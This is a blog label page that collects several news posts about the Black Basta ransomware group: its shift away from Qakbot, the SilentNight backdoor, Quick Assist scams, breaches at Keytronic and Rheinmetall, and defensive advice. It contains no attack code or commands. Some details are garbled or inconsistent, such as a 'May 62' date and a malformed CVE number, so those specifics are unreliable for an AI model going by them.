Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Black Basta. Show all posts
ransomware attacks
AI Black Basta Cyberattacks CyberCrime Cybersecurity CyberThreat malware QakBot Botnet ransomware attacks

Black Basta Unleashes Custom Malware Following Qakbot Takedown

 


Following last year's takedown of the Qakbot botnet, the Black Basta ransomware group has switched to relying on new custom tools and initial access techniques as part of a shift in strategy, as part of this year's efforts to reduce the threat. In response to the escalating threat from ransomware gangs, the Black Basta group has demonstrated a great deal of resilience and an ability to adapt due to the addition of new custom tools and tactics that have been developed to conceal their presence.

With a total of over 500 victims compromised, the group's evolution illustrates the resilience of cyber criminals who have had to change tactics based on law enforcement and other disruptions due to the group's evolution, experts say. Although cybercriminals have faced numerous disruptions due to law enforcement, they continue to flourish in their cybercriminal operations. Black Basta has been known to attack several companies around the world and has been known to do so from as early as the second week of April 2022. 

Currently, there is not much other information available about the new ransomware gang, since they have not yet advertised themselves to the hacking community or recruited affiliates through hacking forums. It seems, however, that by how they can rapidly accumulate new victims and how their negotiations have been conducted, they are not necessarily a new operation. They are likely to be rebranding an old top-tier ransomware gang that brought along their affiliates with them. There is a double-extortion strategy used by the ransomware group, combining data theft and encryption in addition to demanding large ransom payments that can easily reach millions of dollars. 

As part of its earlier campaign of gaining access to corporate networks, the ransomware gang previously formed a partnership with the QBot botnet. The ransomware gang, however, had to create new partnerships after law enforcement was able to disrupt the QBot botnet, according to Mandiant, for them to breach the corporate networks of companies. Further, as part of its monitoring of the UNC4393 threat actors, Mandiant has identified new malware and tools that are being used as part of the Black Basta intrusions, exhibiting the evolution and resilience of the attackers. 

Black Basta has had a busier year than most gangs, with its members compromising some of the largest companies and brands in the world, including Veolia North America, Hyundai Motor Europe, and Keytronic. One of the most telling signs of the sophistication of the threat group is that it has access to zero-day vulnerability exploits, such as the exploit for Windows privilege elevation (2024-26169) and the exploit for VMware ESXi authentication bypass flaw (CVE-2024-37085). 

The most defining characteristic of Black Basta is its prolific use of Qakbot, which was distributed through sophisticated, evolving phishing campaigns that gave rise to the company's reputation. As a Trojan initially deployed to gain access to a victim's computer, Qakbot can then deploy a wide array of open-source tools, like the gang's name-branded ransomware, which is publicly available. After a year or so, the Qakbot botnet went mostly out of commission (though it has re-surfaced since then) as part of a government law enforcement campaign called Operation Duck Hunt in which the group was forced to find new ways of accessing victim infrastructure to conduct their operations. 

The Mandiant research team revealed in a blog post published this week that Black Basta initially used phishing and even vishing as a means to spread other types of malware, such as Darkgate and Pikabot, but within a short period began looking for alternative methods to spread many more threats. According to Mandiant researchers in a post published last month, the group, known as UNC4393, has settled into a phase of transition in recent attacks in which the group is no longer using readily available tools but rather developing custom malware, as well as relying more heavily on access brokers and diversifying the initial access technique. 

As a result of the FBI and DOJ shutting down QBot's infrastructure in late 2023, Black Basta turned to other initial access distribution clusters, most notably those delivering DarkGate malware, as a means of gaining access to systems. In later stages, Black Basta switched to using SilentNight, a tool for the delivery of backdoor malware used for keylogging, to get initial access to their network, which marked a shift away from phishing as the primary method of accessing the network. 

For example, one of the process by which the group gains initial access involves deploying a backdoor called SilentNight, which the group used in 2019 and 2021 to gain access, but put on hold until last year when it was reactivated for the second time. Earlier this year, Black Basta initiated the utilization of a new tactic in their malicious operations by incorporating malvertising efforts, representing a significant deviation from their previously sole reliance on phishing as the initial access method. This shift was highlighted by cybersecurity researchers in a detailed post, emphasizing the strategic evolution of Black Basta's methods. 

SilentNight, a sophisticated C/C++ backdoor, has been identified as a critical component of Black Basta's recent campaigns. This malware communicates via HTTP/HTTPS and potentially employs a domain generation algorithm for its command and control (C2) infrastructure. The backdoor boasts a modular framework, which supports an array of plug-ins providing extensive functionality. These capabilities include system control, screenshot capture, keylogging, file management, and cryptocurrency wallet access. 

Notably, SilentNight also targets credentials through browser manipulation, making it a versatile and potent tool in Black Basta's arsenal. Upon gaining access to targeted environments, Black Basta employs a combination of living-off-the-land (LotL) techniques and custom malware to maintain persistence and facilitate lateral movement. This preparation stage precedes the deployment of ransomware. Researchers have noted that the ultimate objective of UNC4393, the group behind Black Basta, is to rapidly gather and exfiltrate as much data as possible. 

The collected data is then used in multi-faceted extortion schemes, where the threat of data leakage is leveraged to coerce victims into meeting ransom demands. Mandiant's latest report indicates a notable transition within Black Basta from the use of publicly available tools to the deployment of internally developed custom malware. This shift underscores the group’s adaptability and the ongoing threat it poses to organizations of all sizes. 

A security expert emphasized this resilience, pointing out that despite moving away from phishing—a highly successful cybercrime technique—Black Basta continues to present a significant risk. Erich Kron, a security awareness advocate at KnowBe4, commented on the group's operational capabilities, noting, "Given the success of this gang, there's no doubt they have a considerable amount of funds stocked away in their war chest, allowing them to develop their tools and improve their ability to attack." 

This financial backing enables Black Basta to innovate continuously, enhancing its tools and techniques to outmanoeuvre defences. Mandiant researchers further stressed the importance for defenders to adopt a proactive stance, fortifying their security measures with cutting-edge technology and up-to-date threat intelligence. Black Basta's recent attacks have continued to exploit "living off the land" binaries and readily available tools, such as the Windows certutil command-line utility for downloading SilentNight and the Rclone tool for data exfiltration. 

In conclusion, Black Basta remains a formidable global threat and one of the leading entities in the ransomware landscape. Their ability to adapt and evolve necessitates vigilance and advanced defensive strategies from cybersecurity professionals worldwide.
Read more »
Ransomware
AI Black Basta Cyber Security Cyber Threats DDoS Ransomware

Are We Ready for the Next Wave of Cyber Threats?



In our increasingly digital world, cybersecurity is a growing concern for everyone— from businesses and governments to everyday individuals. As technology advances, it opens up exciting possibilities and creates new, sophisticated cyber threats. Recent high-profile attacks, like those on Ascension and the French government, show just how damaging these threats can be.

Cybercriminals are always finding new ways to exploit weaknesses. According to Cybersecurity Ventures, global cybercrime damages could hit $10.5 trillion a year by 2025. This huge number highlights why strong cybersecurity measures are so important.

One major evolution in cyber threats is seen in ransomware attacks. These attacks used to be about locking up data and demanding a ransom to unlock it. Cybercriminals also steal data and threaten to release it publicly, which can disrupt businesses and ruin reputations. For example, in May, the Black Basta group attacked Ascension, the largest non-profit Catholic health system in the U.S., disrupting operations in its 140 hospitals and affecting patient care.

Supply chain attacks are another big concern. These attacks target vulnerabilities in the network of suppliers and partners that businesses rely on. This makes securing the entire supply chain crucial.

Cybercriminals are also using artificial intelligence (AI) to make their attacks more powerful. Examples include DeepLocker, a type of AI-powered malware that stays hidden until it reaches its target, and deepfake scams, where AI creates fake videos or audio to trick people into transferring money. AI-driven malware can change its behaviour to avoid detection, making it even more dangerous.

Distributed denial-of-service (DDoS) attacks are another serious threat. These attacks flood a website or network with so much traffic that it can’t function. In March 2024, a massive DDoS attack targeted over 300 web domains and 177,000 IP addresses linked to the French government, causing major disruptions.

Building a Strong Cybersecurity Defense

To fight these evolving threats, businesses need to build strong cybersecurity defenses. One effective approach is the zero-trust model, which means every access request is verified, no matter where it comes from. Key parts of this model include multi-factor authentication (MFA), which requires more than one form of verification to access systems, and least privilege access, which ensures users only have access to what they need to do their job.

Advanced monitoring tools are also essential. Security information and event management (SIEM) systems, combined with AI-driven analytics, help detect and respond to threats in real time by providing a comprehensive view of network activities.

Human error is a major vulnerability in cybersecurity, so employee training and awareness are crucial. Regular training programs can help employees recognise and respond to threats like phishing attacks, creating a culture of security awareness.

The Role of AI in Cybersecurity

While AI helps cybercriminals, it also offers powerful tools for defending against cyber threats. AI can analyse vast amounts of data to spot patterns and anomalies that might indicate an attack. It can detect unusual behaviour in networks and help security analysts respond more quickly and efficiently to threats.

AI can also identify and mitigate insider threats by analysing user behaviour and spotting deviations from typical activity patterns. This helps strengthen overall security.

The future of cybersecurity will involve constant innovation and adaptation to new challenges. AI will play a central role in both defence and predictive analytics, helping foresee and prevent potential threats. Ethical considerations and developing frameworks for responsible AI use will be important.

Businesses need to stay ahead by adopting new technologies and continuously improving their cybersecurity practices. Collaboration between industries and with government agencies will be crucial in creating comprehensive strategies.

Looking to the future, we need to keep an eye on potential threats and innovations. Quantum computing promises new breakthroughs but also poses a threat to current encryption methods. Advances in cryptography will lead to more secure ways to protect data against emerging threats.

As cyber threats evolve, staying informed and adopting best practices are essential. Continuous innovation and strategic planning are key to staying ahead of cybercriminals and protecting critical assets.


Read more »
Technology
Black Basta Company Breach Ransomware Stolen Data Technology

Securing Sensitive Data: Lessons from Keytronic’s Recent Breach


Keytronic, a prominent printed circuit board assembly (PCBA) manufacturer, recently confirmed a significant data breach. The breach occurred after the Black Basta ransomware gang leaked over 500GB of the company’s stolen data. In this blog post, we delve into the details of the breach, its impact, and Keytronic’s response.

The Breach Details

Attack Timeline 

The breach came to light two weeks ago when Black Basta claimed responsibility for the attack. Keytronic had reported the cyberattack in an SEC filing over a month ago, on May 62.

Operational Disruption 

The attack disrupted Keytronic’s operations, limiting access to critical business applications. As a result, the company had to shut down domestic and Mexico operations for two weeks to address the incident.

Stolen Data

The stolen data included sensitive information such as human resources, finance, engineering, and corporate data. Black Basta shared screenshots of employees’ passports, social security cards, customer presentations, and corporate documents2.

As required by new SEC criteria, the Company has also stated that the attack and loss of production will have a material impact on its financial position in the fourth quarter of 2024, ending on June 29.

Impact and Response

Personal Information Compromised: Keytronic confirmed that personal information was stolen during the breach. The threat actor accessed and exfiltrated limited data from the company’s environment, including personally identifiable information.

Financial Implications: The resulting production loss could impact Keytronic’s financial condition for the fourth quarter, which ends on June 29. The company incurred approximately $600,000 in expenses for external cybersecurity experts, with more costs anticipated.

Lessons Learned

The company has already spent around $600,000 on hiring external cybersecurity experts and expects to pay more. While Keytronic could not identify a specific threat group, the Black Basta ransomware organization claimed the attack two weeks ago, revealing what they claim is all of the stolen data.

The threat actors say that the attack stole human resources, finance, engineering, and business data, and they have shared photos of employee passports and social security cards, as well as customer presentations and company documents.

Black Basta Ransomware

The Black Basta ransomware operation began in April 2022 and is thought to be made up of former members of the Conti ransomware operation, which broke into smaller groups after it shut down.

Black Basta has since grown to be one of the biggest and most damaging ransomware operations, responsible for a large number of attacks, including those against Capita, Hyundai's European division, the Toronto Public Library, the American Dental Association, and, most recently, a ransomware attack on U.S. healthcare giant Ascension.

Between April 2022 and May 2024, a ransomware campaign breached 500 businesses and stole data from at least 12 out of 16 key infrastructure sectors, according to CISA and the FBI.
Read more »
Ransomware
Black Basta Cyber Security Microsoft Quick Assist RaaS Ransomware

Cybercriminals Exploit Windows Quick Assist in Latest Ransomware Campaign

 

A recent wave of cyberattacks has seen financially motivated criminals leveraging Windows Quick Assist, a built-in remote control and screen-sharing tool, to deploy Black Basta ransomware on victim networks. Microsoft has investigated these attacks since mid-April 2024, identifying the threat group behind them as Storm-1811.

The attacks typically begin with email bombing, where the target's inbox is flooded with spam emails. This overload is followed by a phone call from the attackers, who impersonate Microsoft technical support or the victim's IT help desk. They offer to help resolve the spam issue, tricking victims into granting remote access via Quick Assist.

Once access is granted, the attackers execute a scripted command to download malicious files, including Qakbot malware, remote monitoring tools like ScreenConnect and NetSupport Manager, and the Cobalt Strike framework. These tools enable the attackers to perform domain enumeration and move laterally across the network. Eventually, they deploy Black Basta ransomware using PsExec, a telnet-replacement tool.

Rapid7, a cybersecurity company that also detected these attacks, noted that attackers use batch scripts to harvest credentials from the command line using PowerShell. These credentials are often exfiltrated to the attackers' server via Secure Copy (SCP). In some cases, credentials are saved to an archive for later retrieval.

To mitigate these attacks, Microsoft advises organisations to disable or uninstall Quick Assist and similar remote tools if they are not used. Employees should be trained to recognise tech support scams and instructed to only allow remote access if they initiated the contact with IT support. Suspicious Quick Assist sessions should be immediately disconnected.

The Black Basta ransomware operation emerged after the Conti cybercrime group disbanded two years ago following multiple data breaches. Black Basta began operating as a Ransomware-as-a-Service (RaaS) in April 2022 and has since attacked numerous high-profile targets, including defence contractor Rheinmetall, technology company Capita, Hyundai's European division, and the American Dental Association.

Recent attacks linked to Black Basta include a ransomware incident at U.S. healthcare giant Ascension, which disrupted ambulance services. According to a joint advisory by CISA and the FBI, Black Basta affiliates have breached over 500 organisations across 12 out of 16 critical infrastructure sectors since April 2022, causing data breaches and encryption.

Health-ISAC, an information sharing and analysis centre, has warned of increased attacks against the healthcare sector by Black Basta. Research by Elliptic and Corvus Insurance indicates that the group has extorted at least $100 million in ransom payments from over 90 victims by November 2023.

Microsoft is enhancing Quick Assist to improve transparency and trust between users, including adding warning messages to alert users about potential scams. Rapid7 observed similar scams targeting their customers, with attackers using other remote monitoring tools like AnyDesk.

To prevent such attacks, organisations should block unapproved remote management tools and train staff to recognise and report suspicious calls and messages. Quick Assist should only be used if the interaction was initiated by contacting official support channels.

The recent misuse of Windows Quick Assist in deploying Black Basta ransomware pushes forward the vision for increased vigilance and robust cybersecurity practices to save all our digital assets from such social engineering attacks.


Read more »
Remote Access Software
Black Basta CISA FBI RaaS Ransomware Remote Access Software

New Ransomware Threat Hits Hundreds of Organisations Worldwide

 


In a recent joint report by the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI), a new ransomware gang named Black Basta has been identified as breaching over 500 organisations globally between April 2022 and May 2024. This group has targeted various sectors, including healthcare, spanning across North America, Europe, and Australia.

Black Basta, coming through as a Ransomware-as-a-Service (RaaS) operation in April 2022, has quickly gained notoriety by attacking numerous high-profile victims such as Rheinmetall, Hyundai, Capita, and the American Dental Association, among others. Believed to have connections to the former Conti cybercrime syndicate, Black Basta operates with sophistication and a steady stream of initial access to its targets.

One of the key tactics employed by Black Basta involves stealing corporate data before encrypting a company's devices. This stolen data is then used in double-extortion attacks, where victims have demanded a ransom to prevent the publishing of their sensitive information. The gang's data leak site, 'Black Basta Blog' or 'Basta News,' lists victims and progressively releases data to pressure them into paying the ransom.

Technical analysis reveals that Black Basta utilises the ChaCha20 encryption algorithm to encrypt files, rendering them inaccessible without the decryption key. Victims are left with a custom extension appended to their encrypted files (.basta), along with a ransom note providing instructions on how to negotiate with the threat actors.

Responding to this spreading threat, federal agencies advise organisations to maintain up-to-date operating systems, employ phishing-resistant Multi-Factor Authentication (MFA), and train users to identify and report phishing attempts. Moreover, securing remote access software and implementing recommended mitigations are essential steps in blocking the risks posed by Black Basta and similar ransomware attacks.

Healthcare organisations are particularly vulnerable, given their size, technological reliance, and access to sensitive patient information. CISA and the FBI have suggested adhering to the StopRansomware Guide in order to dodge potential attacks in the healthcare sector.

Recent incidents, including an attack on healthcare giant Ascension, accentuate the urgency of addressing the threat posed by Black Basta. With the gang's ability to readily expand its victim pool and employ coercive tactics, organisations must remain particularly careful and implement robust cybersecurity measures to mitigate the risk of falling victim to ransomware attacks.

Considering the course of events, cybersecurity experts emphasise the importance of ardent measures, including regular backups, system updates, and employee training, to strengthen defences against ransomware threats like Black Basta. This calls for collective efforts to combat the growing menace of ransomware and protect critical infrastructure from malicious actors.


Read more »
Threat actors
Backups Black Basta Cyber Attacks Cyberattack Encryption Ransomware attack Threat actors

Rheinmetall Hit by BlackBasta Ransomware: Disruption to Arms Production

Arms manufacturer Rheinmetall has recently confirmed that it fell victim to a ransomware attack orchestrated by the BlackBasta ransomware group. The cyberattack has caused significant disruption to the company's operations, including its arms production capabilities.

Rheinmetall, a prominent German defense contractor, specializes in manufacturing a wide range of military and security equipment. The attack on such a high-profile player in the defense industry underscores the growing threat of ransomware attacks targeting critical infrastructure and sensitive sectors.

The BlackBasta ransomware group, known for its aggressive tactics and targeting of large organizations, has been identified as the perpetrator of the attack. The group employs sophisticated techniques to infiltrate and encrypt the victim's systems, demanding a ransom payment in exchange for the decryption keys.

Rheinmetall has not disclosed the specific ransom amount demanded by the attackers or whether it has chosen to engage in negotiations. However, the incident highlights the potentially devastating impact that ransomware attacks can have on crucial industries, potentially leading to operational disruptions and financial losses.

The immediate consequences of the attack have been felt within Rheinmetall's production facilities, causing delays and interruptions to ongoing arms manufacturing processes. The company has initiated an extensive investigation to assess the extent of the breach and mitigate any potential long-term damage to its operations and reputation.

In response to the attack, Rheinmetall has taken immediate measures to contain the breach and secure its systems. It has engaged external cybersecurity experts to assist in the recovery process and strengthen its defenses against future threats. Additionally, the company has implemented stringent security protocols and is enhancing employee training on cybersecurity best practices.

The incident involving Rheinmetall serves as a stark reminder to organizations across all sectors of the critical importance of maintaining robust cybersecurity measures. Ransomware attacks continue to evolve in sophistication and scale, targeting both public and private entities. The consequences of a successful attack can be severe, ranging from financial losses to reputational damage and even threats to national security.

Organizations must adopt a proactive approach to cybersecurity, including regular system updates, robust backup procedures, and comprehensive incident response plans. By prioritizing cybersecurity measures, organizations can minimize the risk of falling victim to ransomware attacks and other cyber threats.
Read more »
Vulnerabilities
Black Basta Cyberattack malware Vulnerabilities

Cyberattack by Black Basta Gang Using Qakbot Malware

 


In an aggressive and widespread campaign, Black Basta malware is using Qakabot malware - also referred to as QBot or Pinkslipbot - as its initial vector of compromise, which is an.IMG file. This campaign has targeted 10 to 15 different customers over the last two weeks, with a majority of the focus being on US-based companies.

In a threat advisory published by Cybereason Global SOC (GSOC) on November 23, the threat advisory states that the infection is typically initiated by spam or phishing emails that contain malicious links, with Black Basta mainly using Qakbot to stay active on victims’ networks by deploying malicious URL links as their primary method of spreading the infection. 

"The Black Basta ransomware gang is using Qakbot malware to construct an initial point of entry within a target organization's network, allowing it to move laterally and further infiltrate the network," according to the report. 

There have been several groups that have augmented the functionality of Qakbot with additional modules. These groups have been demonstrated to be useful for information theft, backdoors, and website downloaders. A new method of delivering Qakbot's malicious payload has been adopted, and it is no longer delivering it using JavaScript. Instead, it uses Visual Basic. SS

Researchers noted that during the compromise of the domain controller, the threat actor also used Cobalt Strike to gain remote access to the server. This was done to capture data from the machine. The attacker then released ransomware, which in turn disabled security mechanisms such as intrusion detection and prevention and anti-virus programs. 

In the report, the frequency with which attacks take place is highlighted as one of the most concerning aspects. Having gained access to domain administrators' privileges within two hours of obtaining them, ransomware was deployed and was able to be extracted within half a day. 

GSOC observed that a threat actor in more than one attack disabled DNS services locking the victim out of the network, and making it more difficult for him to recover from the attack. 

"Taking all of these observations into consideration, we recommend that security and detection teams keep an eye out for this campaign, which can quickly deteriorate IT infrastructure," the report reads. 

Organizations are advised to take proactive measures such as identifying and blocking malicious network connections, resetting Active Directory access, engaging in incident response efforts, and cleaning up compromised machines, as described in the report. 


Adding capabilities to Qakbot's operations 


There has been an uptick in operations by the Qakbot group lately. Over the past couple of years, they have infected systems, installed attack frameworks, and sold access to other groups, including the Black Basta group. 

As the company continues to expand its access-as-a-service network, it has managed to compromise hundreds of companies with common second-stage payloads, including Emotet malware and two popular attack platforms, enabling the organization to conduct more attacks. 

Several Qakbot operators were observed using DLL sideloading to deliver malware. This is a technique that allows legitimate and malicious files to be placed together in the same directory to escape detection. 

Black Basta is backed by the FIN7 label 


As one of the most prolific ransomware families in recent years, Black Basta is making its ransomware as a service offering available on underground forums in several countries, which means there may be multiple operators with access to Black Basta in their toolkit, making it difficult to attribute the virus to any particular operator. 

While the group has been operating since at least February, it was only discovered two months later that its existence had been detected. A VMware ESXi virtual machine running on a Linux server must be infected with the application to encrypt files in a specific volume folder. As a global organization, the group targets English-speaking countries both domestically and internationally. 

Black Basta is one of the most prominent cybercrime operations that has emerged recently, and according to researchers at SentinelOne, it has been associated with FIN7, a group of financially motivated cybercriminals estimated to have stolen well over $1.2 billion since its inception in 2012.
Read more »
Ransomware
Black Basta Conti Ransomware Cyber Attacks IBM X-Force Ransomware

IBM X-Force Finds New Ransomware Group Black Basta

IBM Security X-Force has been keeping an eye on Black Basta, the latest ransomware gang that first surfaced in April 2022. Until now, Black Basta has claimed to attack over 29 different targets in various industries via double extortion techniques. In double extortion, the threat actors execute ransomware along with stealing data and blackmail to post it publicly unless their ransom demands are not met. 

The data discourse points of these ransomware attacks take place on a data leak website called Tor network. To make the victim pay the ransom, the Black Basta group progressively publishes the stolen data on the leak site. The group is still in the early phase of its organization, X-Force has not found any pieces of evidence of distributing the malware or hiring threat actors on underground platforms or the dark web. 

Due to similarities in operations and no affiliation attempts, experts believe that the Black Basta group is a new version of Conti gan, infamous ransomware groups already having various affiliates. But Conti group recently announced that it has no links with the Black Basta ransomware group. X-Force is currently finding the relationship between these two. 

Black Basta ransomware gang works at a very high pace, it hardly alerts the cybersecurity defenders and by the time they realize, the damage has already been done. Experts say it doesn't seem that Black Basta is attacking specific industries or verticals. But for organizations that collect data in large quantities can become a victim of extortion attacks like personally identifiable information (PII), financial credentials, sensitive information, etc are easy targets for attackers.  

Concerned users can read IBM X-Force Definitive Guide to Ransomware and follow some basic guidelines:

  • Having routine backups, both online and offline, a robust backup mechanism helps in recovery from a ransomware attack. 
  • Build a plan to protect against unauthorized data theft, especially as it concerns uploading vast amounts of data to trusted cloud platforms that threat actors might exploit. 
  • Apply user behavior analytics to predict security incidents. If triggered, assume a breach happened- audit, monitor, and act quickly on the attack associated with privileged accounts and groups. 
  • Implement two-factor authentication on each remote access point into an organization network- special attention should be given to disabling or secure remote desktop protocol (RDP) access. Various ransomware attacks in the past were able to exploit weak RDP access to have early access into a network.

Read more »
Subscribe to: Posts (Atom)